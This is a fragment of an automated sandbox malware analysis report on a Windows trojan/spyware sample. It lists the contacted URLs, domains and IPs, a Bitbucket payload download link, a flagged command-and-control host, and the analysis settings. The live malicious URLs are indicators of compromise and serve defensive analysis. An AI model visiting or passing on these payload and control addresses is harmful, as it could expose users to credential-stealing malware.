                              		unknownfalseunknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://yspasenana.xyz/false
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://duckduckgo.com/chrome_newtab325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drfalse
                                		high
                                http://service.r325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://duckduckgo.com/ac/?q=325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drfalse
                                  		high
                                  https://is.gd/kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpfalse
                                    		high
                                    http://ahkscript.orgkS2dqbsDwD.exe, kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmpfalse
                                    • 1%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://web-security-reports.services.atlassian.com/csp-report/bb-website;kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpfalse
                                      		high
                                      https://api.ip.sb/geoip325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://yspasenana.xyz4325.exe, 0000000E.00000002.363745282.0000000002CC3000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/soap/envelope/D325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmpfalse
                                        		high
                                        http://tempuri.org/325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363663060.0000000002C48000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363765245.0000000002CC8000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fontbureau.com/designers325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                          		high
                                          http://ns.adobe.c/g325.exe, 0000000E.00000003.361749064.0000000008E80000.00000004.00000001.sdmp, 325.exe, 0000000E.00000003.356337504.0000000008E71000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://yspasenana.xyz:80/325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://tempuri.org/Endpoint/SetEnvironment325.exe, 0000000E.00000002.363824201.0000000002CDE000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://tempuri.org/Endpoint/SetEnvironmentResponse325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.sajatypeworks.com325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://tempuri.org/Endpoint/GetUpdates325.exe, 0000000E.00000002.363745282.0000000002CC3000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363765245.0000000002CC8000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363553809.0000000002BDB000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://is.gd/bkS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpfalse
                                            		high
                                            https://support.google.com/chrome/?p=plugin_real325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.founder.com.cn/cn/cThe325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://is.gd/nKi5S3HkS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpfalse
                                                		high
                                                https://iplogger.org/ykS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.interoperabilitybridges.com/wmp-extension-for-chrome325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://support.google.com/chrome/?p=plugin_pdf325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://bbuseruploads.s3.amazonaws.com/c6138a8d-6b23-4fcf-ac63-5ded44dfc386/downloads/cf4ea471-f159-kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.galapagosdesign.com/DPlease325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://tempuri.org/Endpoint/VerifyUpdate325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.urwpp.deDPlease325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.zhongyicts.com.cn325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://forms.real.com/real/realone/download.html?type=rpsp_us325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://support.a325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://yspasenana.xyz325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://bitbucket.org/kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://support.google.com/chrome/?p=plugin_quicktime325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://ns.adobe.cobj325.exe, 0000000E.00000003.361749064.0000000008E80000.00000004.00000001.sdmp, 325.exe, 0000000E.00000003.356337504.0000000008E71000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://schemas.datacontract.org/2004/07/325.exe, 0000000E.00000002.363663060.0000000002C48000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://api.ip.sb/geoip%USERPEnvironmentROFILE%325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://bitbucket.org/luisadoma999/admin/downloads/325.exekS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000003.304898256.00000000008FA000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drfalse
                                                                    		high
                                                                    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0skS2dqbsDwD.exefalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://bitbucket.org/luisadoma999/admin/downloads/325.exelqkS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://tempuri.org/Endpoint/SetEnviron325.exe, 0000000E.00000002.363824201.0000000002CDE000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.carterandcone.coml325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.fontbureau.com/designers/frere-jones.html325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://support.google.com/chrome/?p=plugin_shockwave325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://forms.rea325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://tempuri.org/Endpoint/EnvironmentSettingsResponse325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://iplogger.org/1Spbs7%A_AppData%kS2dqbsDwD.exe, 00000000.00000003.304864468.00000000008C6000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://is.gd/nKi5S3$kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://aui-cdn.atlassian.comkS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://is.gd/nKi5S3%A_AppData%kS2dqbsDwD.exe, 00000000.00000003.304864468.00000000008C6000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://www.fontbureau.com/designersG325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.fontbureau.com/designers/?325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://www.founder.com.cn/cn/bThe325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://support.google.com/chrome/?p=plugin_wmp325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://ocsp.sectigo.com0kS2dqbsDwD.exefalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://www.fontbureau.com/designers?325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://support.google.com/chrome/answer/6258784325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://tempuri.org/Endpoint/EnvironmentSettings325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363513965.0000000002BAC000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://schemas.xmlsoap.org/soap/envelope/325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363663060.0000000002C48000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363765245.0000000002CC8000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://support.google.com/chrome/?p=plugin_flash325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.tiro.com325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://iplogger.org/kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.goodfont.co.kr325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#kS2dqbsDwD.exefalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://support.google.com/chrome/?p=plugin_java325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://tempuri.org/Endpoint/VerifyUpdateResponse325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://go.micros325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      http://www.typography.netD325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      http://www.galapagosdesign.com/staff/dennis.htm325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      http://fontfabrik.com325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://d301sr5gafysq2.cloudfront.net;kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		low
                                                                                                      https://api.ipify.orgcookies//settinString.Removeg325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/fault325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://sectigo.com/CPS0CkS2dqbsDwD.exefalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://sectigo.com/CPS0DkS2dqbsDwD.exefalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://is.gd/nKi5S3kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmpfalse
                                                                                                          		high
                                                                                                          https://support.google.com/chrome/?p=plugin_divx325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://tempuri.org/0325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://www.fonts.com325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.sandoll.co.kr325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://bbuseruploads.s3.amazonaws.com/is.gdkS2dqbsDwD.exe, 00000000.00000002.307255166.0000000000943000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.sakkal.com325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://ipinfo.io/ip%appdata%325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.apache.org/licenses/LICENSE-2.0325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.fontbureau.com325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://iplogger.org/1Spbs7ekS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://sectigo.com/CPS0kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.ico325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drfalse
                                                                                                                            		high
                                                                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://api.ip.sb325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://helpx.ad325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drfalse
                                                                                                                                		high
                                                                                                                                http://ahkscript.orgCouldkS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown

                                                                                                                                Contacted IPs

                                                                                                                                • No. of IPs < 25%
                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                • 75% < No. of IPs

                                                                                                                                Public

                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                212.224.105.105
                                                                                                                                		yspasenana.xyzGermany
                                                                                                                                		44066DE-FIRSTCOLOwwwfirst-colonetDEtrue
                                                                                                                                104.192.141.1
                                                                                                                                		bitbucket.orgUnited States
                                                                                                                                		16509AMAZON-02USfalse
                                                                                                                                104.25.234.53
                                                                                                                                		is.gdUnited States
                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                88.99.66.31
                                                                                                                                		iplogger.orgGermany
                                                                                                                                		24940HETZNER-ASDEfalse
                                                                                                                                52.217.201.169
                                                                                                                                		s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                		16509AMAZON-02USfalse

                                                                                                                                General Information

                                                                                                                                Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                Analysis ID:452457
                                                                                                                                Start date:22.07.2021
                                                                                                                                Start time:11:42:10
                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                Overall analysis duration:0h 10m 35s
                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                Report type:light
                                                                                                                                Sample file name:kS2dqbsDwD (renamed file extension from none to exe)
                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                Number of analysed new started processes analysed:24
                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                Number of existing processes analysed:0
                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                Number of injected processes analysed:0
                                                                                                                                Technologies:
                                                                                                                                • HCA enabled
                                                                                                                                • EGA enabled
                                                                                                                                • HDC enabled
                                                                                                                                • AMSI enabled
                                                                                                                                Analysis Mode:default
                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                Detection:MAL
                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@5/29@9/5
                                                                                                                                EGA Information:Failed
                                                                                                                                HDC Information:
                                                                                                                                • Successful, ratio: 2% (good quality ratio 0.9%)
                                                                                                                                • Quality average: 31.8%
                                                                                                                                • Quality standard deviation: 39.8%
                                                                                                                                HCA Information:
                                                                                                                                • Successful, ratio: 83%
                                                                                                                                • Number of executed functions: 0
                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                Cookbook Comments:
                                                                                                                                • Adjust boot time
                                                                                                                                • Enable AMSI
                                                                                                                                Warnings:
                                                                                                                                Show All
                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                                                                                • TCP Packets have been reduced to 100
                                                                                                                                • Excluded IPs from analysis (whitelisted): 23.211.6.115, 104.43.193.48, 13.64.90.137, 20.82.210.154, 23.211.4.86, 52.255.188.83, 40.112.88.60, 13.88.21.125, 20.82.209.183, 80.67.82.235, 80.67.82.211, 104.26.12.31, 104.26.13.31, 172.67.75.172, 20.49.157.6
                                                                                                                                • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolwus15.cloudapp.net
                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                Simulations

                                                                                                                                Behavior and APIs

                                                                                                                                TimeTypeDescription
                                                                                                                                11:42:57API Interceptor1x Sleep call for process: kS2dqbsDwD.exe modified
                                                                                                                                11:44:07API Interceptor46x Sleep call for process: 325.exe modified

                                                                                                                                Joe Sandbox View / Context

                                                                                                                                IPs

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                212.224.105.105Nb2HQZZDIf.exeGet hashmaliciousBrowse
                                                                                                                                • yspasenana.xyz/
                                                                                                                                104.192.141.1Nb2HQZZDIf.exeGet hashmaliciousBrowse
                                                                                                                                  r3xwkKS58W.exeGet hashmaliciousBrowse
                                                                                                                                    P58w6OezJY.exeGet hashmaliciousBrowse
                                                                                                                                      lpaBPnb1OB.exeGet hashmaliciousBrowse
                                                                                                                                        2aJ9QdIdFE.exeGet hashmaliciousBrowse
                                                                                                                                          EA4LughYnY.exeGet hashmaliciousBrowse
                                                                                                                                            etSPaoVcAD.exeGet hashmaliciousBrowse
                                                                                                                                              kxQkjkU9DO.exeGet hashmaliciousBrowse
                                                                                                                                                9CMjcYFBxo.exeGet hashmaliciousBrowse
                                                                                                                                                  JvlwIeO09R.exeGet hashmaliciousBrowse
                                                                                                                                                    pEIro35JRJ.exeGet hashmaliciousBrowse
                                                                                                                                                      AEdU8eJHgN.exeGet hashmaliciousBrowse
                                                                                                                                                        YIrI3VuV0W.exeGet hashmaliciousBrowse
                                                                                                                                                          8zsiEeSTzI.exeGet hashmaliciousBrowse
                                                                                                                                                            k6sy0WOByI.exeGet hashmaliciousBrowse
                                                                                                                                                              kvAgGyJqYT.exeGet hashmaliciousBrowse
                                                                                                                                                                A7DmPhc0bs.exeGet hashmaliciousBrowse
                                                                                                                                                                  Coupon-Codes-2021.docGet hashmaliciousBrowse
                                                                                                                                                                    k53f1UmAkl.exeGet hashmaliciousBrowse
                                                                                                                                                                      q7jxy6gZMb.exeGet hashmaliciousBrowse
                                                                                                                                                                        104.25.234.53Pdf Document.exeGet hashmaliciousBrowse
                                                                                                                                                                        • is.gd/TGKGYYYYZ

                                                                                                                                                                        Domains

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        bitbucket.orgNb2HQZZDIf.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        HryPYPQtcg.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        oOoVvuAQS9.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        6FORhr7lC1.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        2aJ9QdIdFE.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        EA4LughYnY.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        etSPaoVcAD.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        kxQkjkU9DO.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        9CMjcYFBxo.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        JvlwIeO09R.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        pEIro35JRJ.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        AEdU8eJHgN.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        YIrI3VuV0W.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        8zsiEeSTzI.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
                                                                                                                                                                        k6sy0WOByI.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.192.141.1
